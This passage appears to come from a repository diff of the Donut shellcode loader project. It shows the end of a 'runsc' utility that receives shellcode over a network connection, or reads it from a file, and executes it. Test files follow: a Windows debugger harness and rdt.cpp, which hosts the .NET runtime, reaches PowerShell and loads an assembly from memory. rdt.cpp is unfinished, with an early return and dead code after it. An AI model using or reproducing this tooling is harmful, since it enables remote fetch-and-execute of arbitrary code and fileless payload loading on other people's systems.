447 return p->code_len;
448 }
449
450 /**F*****************************************************************/
451 int csr (args_t *p)
452 /**
453 * PURPOSE : opens connection to remote system and sends shellcode
454 *
455 * RETURN : 0 or 1
456 *
457 * NOTES : None
458 *
459 *F*/
460 {
461 int s, r, opt;
462 fd_set fds;
463 struct timeval tv;
464
465 printf ("[ creating socket\n");
466 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
467 if (s < 0) return 0;
468
469 // try connect to remote
470 printf ("[ connecting to %s\n", addr2ip(p));
471 r = connect(s, p->ai_addr, p->ai_addrlen);
472
473 if (r == 0) {
474 if (p->tx_mode==RSC_SEND) {
475 send_data(p, s);
476 } else {
477 recv_data(p, s);
478 xcode(p);
479 }
480 } else {
481 xstrerror("connect");
482 }
483 printf ("[ closing connection\n");
484 shutdown(s, SHUT_RDWR);
485 close(s);
486 return 1;
487 }
488
489 /**F*****************************************************************/
490 void xfile(args_t *p)
491 /**
492 * PURPOSE : read contents of shellcode and attempt to execute it locally
493 *
494 * RETURN : Nothing
495 *
496 * NOTES : None
497 *
498 *F*/
499 {
500 FILE *fd;
501 int len;
502 void *pv;
503
504 p->code_len = 0;
505 p->code = NULL;
506
507 printf ("[ reading code from %s\n", p->file);
508 fd = fopen(p->file, "rb");
509
510 if (fd == NULL) {
511 xstrerror("fopen(\"%s\")", p->file);
512 return;
513 }
514 // read contents of file
515 for (;;) {
516 // first loop? allocate block
517 if(p->code == NULL) {
518 p->code = malloc(BUFSIZ);
519 }
520 // read a block of data
521 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
522 if (len <= 0) break;
523 p->code_len += len;
524 // resize buffer for next read
525 pv = realloc(p->code, p->code_len + BUFSIZ);
526
527 if(pv == NULL) {
528 p->code_len = 0;
529 free(p->code);
530 p->code = NULL;
531 printf("[ error: out of memory!.\n");
532 break;
533 }
534 p->code = pv;
535 }
536 fclose(fd);
537
538 if(p->code_len != 0) {
539 xcode(p);
540 }
541 }
542
543 #ifdef WIN
544 void load_modules(char *names) {
545 HMODULE mod;
546 char *p = strtok(names, ";,");
547
548 while (p != NULL) {
549 printf ("[ loading %s...", p);
550 mod = LoadLibrary(p);
551
552 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
553
554 p = strtok(NULL, ";,");
555 }
556 }
557 #endif
558
559 /**F*****************************************************************/
560 void usage (void) {
561 printf ("\n usage: runsc <address> [options]\n");
562 printf ("\n -4 Use IP version 4 (default)");
563 printf ("\n -6 Use IP version 6");
564 printf ("\n -l Listen mode (required when listening on specific interface)");
565 #ifdef WIN
566 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
567 #endif
568 printf ("\n -f <file> Read PIC from <file>");
569 printf ("\n -s <count> Simulate real process by creating file descriptors");
570 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
571 printf ("\n -x Execute PIC (requires -f)");
572 printf ("\n\n Press any key to continue . . .");
573 getchar ();
574
575 exit (0);
576 }
577
578 /**F*****************************************************************/
579 char* getparam (int argc, char *argv[], int *i) {
580 int n=*i;
581 if (argv[n][2] != 0) {
582 return &argv[n][2];
583 }
584 if ((n+1) < argc) {
585 *i=n+1;
586 return argv[n+1];
587 }
588 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
589 exit (0);
590 }
591
592 void parse_args (args_t *p, int argc, char *argv[]) {
593 int i;
594 char opt;
595
596 // for each argument
597 for (i=1; i<argc; i++)
598 {
599 // is this option?
600 if (argv[i][0]=='-' || argv[i][1]=='/')
601 {
602 // get option value
603 opt=argv[i][1];
604 switch (opt)
605 {
606 case '4':
607 p->ai_family=AF_INET;
608 break;
609 case '6': // use ipv6 (default is ipv4)
610 p->ai_family=AF_INET6;
611 break;
612 case 'x': // execute PIC, requires -f
613 p->mode=RSC_EXEC;
614 break;
615 case 'd': // debug the code
616 p->dbg=1;
617 break;
618 case 'f': // file
619 p->file=getparam(argc, argv, &i);
620 break;
621 case 'l': // listen for incoming connections
622 p->mode=RSC_SERVER;
623 break;
624 #ifdef WIN
625 case 'm': // windows only, loads modules required by shellcode
626 p->modules = getparam(argc, argv, &i);
627 break;
628 #endif
629 case 's': // create file descriptors before execution
630 p->sim=atoi(getparam(argc, argv, &i));
631 break;
632 case 'p': // port number
633 p->port=getparam(argc, argv, &i);
634 p->port_nbr=atoi(p->port);
635 break;
636 case '?': // display usage
637 case 'h':
638 usage ();
639 break;
640 default:
641 printf ("[ unknown option %c\n", opt);
642 usage();
643 break;
644 }
645 } else {
646 // assume it's hostname or ip
647 p->address=argv[i];
648 p->mode=RSC_CLIENT;
649 }
650 }
651 }
652
653 int main (int argc, char *argv[]) {
654 args_t args;
655 struct stat st;
656
657 #ifdef WIN
658 //
659 PVOID OldValue=NULL;
660 WSADATA wsa;
661
662 //Wow64DisableWow64FsRedirection (&OldValue);
663 LoadLibrary("ws2_32");
664 LoadLibrary("advapi32");
665
666 WSAStartup(MAKEWORD(2,0), &wsa);
667 #endif
668
669 setbuf(stdout, NULL);
670 setbuf(stderr, NULL);
671
672 memset (&args, 0, sizeof(args));
673
674 // set default parameters
675 args.address = NULL;
676 args.file = NULL;
677 args.ai_family = AF_INET;
678 args.port = DEFAULT_PORT;
679 args.port_nbr = atoi(args.port);
680 args.mode = -1;
681 args.tx_mode = -1;
682 args.sim = 0;
683 args.dbg = 0;
684
685 printf ("\n[ run shellcode v0.2\n");
686
687 parse_args(&args, argc, argv);
688
689 // check if we have file parameter and it accessible
690 if (args.file!=NULL) {
691 if (stat (args.file, &st)) {
692 printf ("[ unable to access %s\n", args.file);
693 return 0;
694 }
695 }
696
697 #ifdef WIN
698 if (args.modules != NULL) {
699 load_modules(args.modules);
700 }
701 #endif
702 // if mode is executing
703 if (args.mode == RSC_EXEC) {
704 if (args.file != NULL) {
705 xfile(&args);
706 return 0;
707 } else {
708 printf ("\n[ you've used -x without supplying file with -f");
709 return 0;
710 }
711 }
712 if (init_network(&args)) {
713 // if no file specified, we receive and execute data
714 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
715
716 // if mode is -1, we listen for incoming connections
717 if (args.mode == -1) {
718 args.mode=RSC_SERVER;
719 }
720
721 // if no file specified, set to receive one
722 if (args.tx_mode == -1) {
723 args.tx_mode = RSC_RECV;
724 }
725
726 if (args.mode == RSC_SERVER) {
727 ssr (&args);
728 } else {
729 csr (&args);
730 }
731 }
732 if(args.code_len != 0) {
733 free(args.code);
734 }
735 return 0;
736 }
+37
-0
loader/test/api_test.c less more
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
+184
-0
loader/test/debug.cpp less more
0
1 // example of using the windows debugger engine from console
2 // derived from code by the blabberer
3
4 #include "debug.h"
5
6 // ##################### Debug class ########################
7 Debug::Debug() {
8 Client = NULL;
9 Control = NULL;
10 Breakpoint = NULL;
11
12 // create instance of IDebugClient
13 Status = DebugCreate(__uuidof(IDebugClient), (void**)&Client);
14 if(Status == S_OK) {
15 // obtain IDebugControl interface
16 Status = Client->QueryInterface(__uuidof(IDebugControl), (void**)&Control);
17 if(Status == S_OK) {
18 // setup callbacks for console I/O
19 Client->SetOutputCallbacks(&OutputCb);
20 Client->SetInputCallbacks(&InputCb);
21 InputCb.Control = Control;
22
23 Client->SetEventCallbacks(&EventCb);
24 EventCb.Control = Control;
25 }
26 }
27 }
28
29 // create new process or attach to existing one
30 // CommandLine should be set to NULL if attaching
31 Debug::Debug(PSTR CommandLine, ULONG ProcessId) {
32 Debug();
33 Start(CommandLine, ProcessId);
34 }
35
36 Debug::~Debug() {
37 if (Control != NULL) {
38 Control->Release();
39 Control = NULL;
40 }
41 if (Client != NULL) {
42 Client->EndSession(DEBUG_END_PASSIVE);
43 Client->Release();
44 Client = NULL;
45 }
46 }
47
48 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId) {
49 ULONG AttachFlags = DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND;
50 ULONG CreateFlags = DEBUG_ONLY_THIS_PROCESS;
51
52 Status = Client->CreateProcessAndAttach(0, CommandLine, CreateFlags, ProcessId, AttachFlags);
53 return Status == S_OK;
54 }
55
56 // ##################### IDebugOutputCallbacks ########################
57 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebugoutputcallbacks
58 STDMETHODIMP StdioOutputCallbacks::QueryInterface(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
59 *Interface = NULL;
60
61 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
62 IsEqualIID(InterfaceId, __uuidof(IDebugOutputCallbacks))) {
63 *Interface = (IDebugOutputCallbacks *)this;
64 AddRef();
65 return S_OK;
66 } else {
67 return E_NOINTERFACE;
68 }
69 }
70
71 // ##################### IDebugInputCallbacks ########################
72 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebuginputcallbacks
73 STDMETHODIMP StdioInputCallbacks::QueryInterface( THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
74 *Interface = NULL;
75
76 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
77 IsEqualIID(InterfaceId, __uuidof(IDebugInputCallbacks))) {
78 *Interface = (IDebugInputCallbacks *)this;
79 AddRef();
80 return S_OK;
81 } else {
82 return E_NOINTERFACE;
83 }
84 }
85
86 STDMETHODIMP StdioInputCallbacks::StartInput(THIS_ IN ULONG BufferSize) {
87 char *Buffer;
88
89 Buffer = (char *)calloc(1, BufferSize+8);
90 fgets(Buffer, BufferSize, stdin);
91 Control->ReturnInput(Buffer);
92 free(Buffer);
93
94 return S_OK;
95 }
96
97 // ##################### DebugBaseEventCallbacks ########################
98 STDMETHODIMP EventCallbacks::Breakpoint( THIS_ IN PDEBUG_BREAKPOINT Bp ) {
99 return DEBUG_STATUS_BREAK;
100 }
101
102 STDMETHODIMP EventCallbacks::CreateProcess(THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle,
103 IN ULONG64 BaseOffset,IN ULONG ModuleSize,IN PCSTR ModuleName,IN PCSTR ImageName,
104 IN ULONG CheckSum, IN ULONG TimeDateStamp,IN ULONG64 InitialThreadHandle,
105 IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset
106 )
107 {
108 HRESULT Status;
109 IDebugBreakpoint* Breakpoint;
110
111 Status = Control->AddBreakpoint(DEBUG_BREAKPOINT_CODE, DEBUG_ANY_ID, &Breakpoint);
112 if(Status == S_OK) {
113 Status = Breakpoint->SetOffset(StartOffset);
114 if(Status == S_OK) {
115 Status = Breakpoint->SetFlags(DEBUG_BREAKPOINT_ENABLED);
116 }
117 }
118 return DEBUG_STATUS_NO_CHANGE;
119 }
120
121 STDMETHODIMP EventCallbacks::CreateThread(THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset, IN ULONG64 StartOffset) {
122 return DEBUG_STATUS_NO_CHANGE;
123 }
124
125 STDMETHODIMP EventCallbacks::Exception( THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance ) {
126 return DEBUG_STATUS_BREAK;
127 }
128
129 STDMETHODIMP EventCallbacks::ExitProcess (THIS_ IN ULONG ExitCode ) {
130 return DEBUG_STATUS_NO_CHANGE;
131 }
132
133 STDMETHODIMP EventCallbacks::ExitThread (THIS_ IN ULONG ExitCode ) {
134 return DEBUG_STATUS_NO_CHANGE;
135 }
136
137 STDMETHODIMP EventCallbacks::GetInterestMask( THIS_ OUT PULONG Mask ) {
138 *Mask =
139 DEBUG_EVENT_BREAKPOINT |
140 DEBUG_EVENT_EXCEPTION |
141 DEBUG_EVENT_CREATE_THREAD |
142 DEBUG_EVENT_EXIT_THREAD |
143 DEBUG_EVENT_CREATE_PROCESS |
144 DEBUG_EVENT_EXIT_PROCESS |
145 DEBUG_EVENT_LOAD_MODULE |
146 DEBUG_EVENT_UNLOAD_MODULE |
147 DEBUG_EVENT_SYSTEM_ERROR |
148 DEBUG_EVENT_SESSION_STATUS |
149 DEBUG_EVENT_CHANGE_DEBUGGEE_STATE |
150 DEBUG_EVENT_CHANGE_ENGINE_STATE |
151 DEBUG_EVENT_CHANGE_SYMBOL_STATE;
152 return S_OK;
153 }
154
155 STDMETHODIMP EventCallbacks::LoadModule( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset,
156 IN ULONG ModuleSize,IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp ) {
157 return DEBUG_STATUS_NO_CHANGE;
158 }
159
160 STDMETHODIMP EventCallbacks::SystemError( THIS_ IN ULONG Error, IN ULONG Level ) {
161 return DEBUG_STATUS_BREAK;
162 }
163
164 STDMETHODIMP EventCallbacks::UnloadModule( THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset ) {
165 return DEBUG_STATUS_NO_CHANGE;
166 }
167
168 STDMETHODIMP EventCallbacks::SessionStatus( THIS_ IN ULONG SessionStatus ) {
169 return DEBUG_STATUS_NO_CHANGE;
170 }
171
172 STDMETHODIMP EventCallbacks::ChangeDebuggeeState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
173 //State = 1;
174 return DEBUG_STATUS_NO_CHANGE;
175 }
176
177 STDMETHODIMP EventCallbacks::ChangeEngineState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
178 return DEBUG_STATUS_NO_CHANGE;
179 }
180
181 STDMETHODIMP EventCallbacks::ChangeSymbolState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
182 return DEBUG_STATUS_NO_CHANGE;
183 }
+71
-0
loader/test/debug.h less more
0
1 #ifndef DEBUG_H
2 #define DEBUG_H
3
4 #include <windows.h>
5 #include <dbgeng.h>
6 #include <stdio.h>
7
8 #pragma comment(lib, "dbgeng.lib")
9
10 class EventCallbacks : public DebugBaseEventCallbacks {
11 public:
12 STDMETHOD_(ULONG, AddRef) (THIS ) { return 1;};
13 STDMETHOD_(ULONG, Release) (THIS ) { return 0;};
14 STDMETHOD(Breakpoint) (THIS_ IN PDEBUG_BREAKPOINT Bp );
15 STDMETHOD(ChangeDebuggeeState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
16 STDMETHOD(ChangeEngineState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
17 STDMETHOD(ChangeSymbolState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
18 STDMETHOD(CreateThread) (THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset,IN ULONG64 StartOffset);
19 STDMETHOD(Exception) (THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance );
20 STDMETHOD(ExitProcess) (THIS_ IN ULONG ExitCode );
21 STDMETHOD(ExitThread) (THIS_ IN ULONG ExitCode );
22 STDMETHOD(GetInterestMask) (THIS_ OUT PULONG Mask );
23 STDMETHOD(SessionStatus) (THIS_ IN ULONG Status );
24 STDMETHOD(SystemError) (THIS_ IN ULONG Error, IN ULONG Level );
25 STDMETHOD(UnloadModule) (THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset );
26 STDMETHOD(LoadModule) (THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName,IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp );
27 STDMETHOD(CreateProcess) ( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp, IN ULONG64 InitialThreadHandle, IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset );
28
29 IDebugClient* Client;
30 IDebugControl* Control;
31 };
32
33 class StdioOutputCallbacks : public IDebugOutputCallbacks {
34 public:
35 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
36 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
37 STDMETHOD_(ULONG, Release)(THIS){ return 0; };
38 STDMETHOD(Output)(THIS_ IN ULONG Mask, IN PCSTR Text) { fputs(Text, stdout); return S_OK; };
39 };
40
41 class StdioInputCallbacks : public IDebugInputCallbacks {
42 public:
43 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
44 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
45 STDMETHOD_(ULONG, Release)(THIS) { return 0; };
46 STDMETHOD(StartInput)(THIS_ IN ULONG BufferSize);
47 STDMETHOD(EndInput)(THIS_ void) { return S_OK; };
48
49 IDebugControl* Control;
50 };
51
52 class Debug {
53 public:
54 Debug();
55 Debug(PSTR CommandLine, ULONG ProcessId);
56 ~Debug();
57 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId);
58
59 StdioOutputCallbacks OutputCb;
60 StdioInputCallbacks InputCb;
61 EventCallbacks EventCb;
62
63 IDebugClient* Client;
64 IDebugControl* Control;
65 IDebugBreakpoint* Breakpoint;
66 bool State;
67 HRESULT Status;
68 };
69
70 #endif
+440
-0
loader/test/rdt.cpp less more
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
